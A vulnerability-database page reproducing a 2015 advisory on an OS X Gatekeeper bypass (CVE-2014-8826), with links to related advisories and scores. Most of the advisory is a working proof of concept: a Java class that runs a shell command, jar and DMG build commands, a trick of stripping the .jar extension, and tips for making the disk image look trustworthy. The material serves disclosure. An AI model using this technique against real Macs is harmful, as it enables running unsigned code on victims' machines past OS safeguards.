Vulners
Lucene search
OS X < 10.10.x - Gatekeeper bypass Vulnerability
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | OS X < 10.10.x - Gatekeeper bypass Vulnerability | 29 Jan 201500:00 | – | zdt |
 | Mac OS X < 10.10.2 Multiple Vulnerabilities | 4 Mar 201500:00 | – | nessus |
| Mac OS X 10.10.x < 10.10.2 Multiple Vulnerabilities (POODLE) | 29 Jan 201500:00 | – | nessus |
| Mac OS X Multiple Vulnerabilities (Security Update 2015-001) (POODLE) | 29 Jan 201500:00 | – | nessus |
 | Apple Mac OS X Gatekeeper Protection Security Bypass Vulnerability | 29 Jan 201500:00 | – | cnvd |
 | CVE-2014-8826 | 30 Jan 201511:00 | – | cve |
 | CVE-2014-8826 | 30 Jan 201511:00 | – | cvelist |
 | Apple Mac OSX < 10.10.x - GateKeeper Bypass | 29 Jan 201500:00 | – | exploitdb |
 | Apple Mac OSX 10.10.x - GateKeeper Bypass | 29 Jan 201500:00 | – | exploitpack |
 | Gatekeeper’s Achilles heel: Unearthing a macOS vulnerability | 19 Dec 202218:00 | – | mmpc |
10
The exploitation technique is trivial and requires Java to be installed
on the victim's machine.
OS X Gatekeeper prevents execution of downloaded Java Jar (.jar) and
class (.class) files, but this verification can be bypassed.
For example:
- Create a JAR file containing the code to be executed
For example,
File AmpliaTest.java:
public class AmpliaTest {
public static void main(String[] args) {
try { Runtime.getRuntime().exec("/usr/bin/touch /tmp/AMPLIASECURITY");
} catch(Exception e) { }
}
}
(This is just an example, of course, arbitrary code can be executed)
$ javac AmpliaTest.java
Be sure to compile the code for a version of Java lower than or equal to
the one available on the target (for example, javac -target 1.6 -source
1.6 AmpliaTest.java; and the compiled code will work on Java versions >=
1.6) .
$ echo "main-class: AmpliaTest" > Manifest
$ jar cmf Manifest UnsignedCode.jar AmpliaTest.class
- Create a .DMG disk image
For example:
$ hdiutil create -size 5m -fs HFS+ -volname AmpliaSecurity AmpliaTest.dmg
- Mount AmpliaTest.dmg
- Rename UnsignedCode.jar to UnsignedCode (just remove the extension)
- Copy UnsignedCode to the AmpliaSecurity volume
- Unmount AmpliaTest.dmg
- Host the file AmpliaTest.dmg on a web server
- Download AmpliaTest.dmg using Safari and open it
- Double-Click on 'UnsignedCode' and the code will be executed bypassing
OS X Gatekeeper checks (the code creates the file /tmp/AMPLIASECURITY).
(Perform the same steps but without removing the .jar extension to
UnsignedCode.jar and OS X Gatekeeper will prevent execution of the Jar file)
Because the file 'UnsignedCode' has no extension, Finder will display a
blank page icon; the Java/JAR icon will not be displayed. The user does
not know he is double-clicking on a JAR file and the file does not look
particularly suspicious. Also, since the unsigned code is distributed
inside a disk image (.DMG) file, there are many things the attacker can
do to gain the trust of the user (include other files, use Finder
background images, etc).
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Sep 2015 00:00Current
5.6Medium risk
Vulners AI Score5.6
EPSS0.13969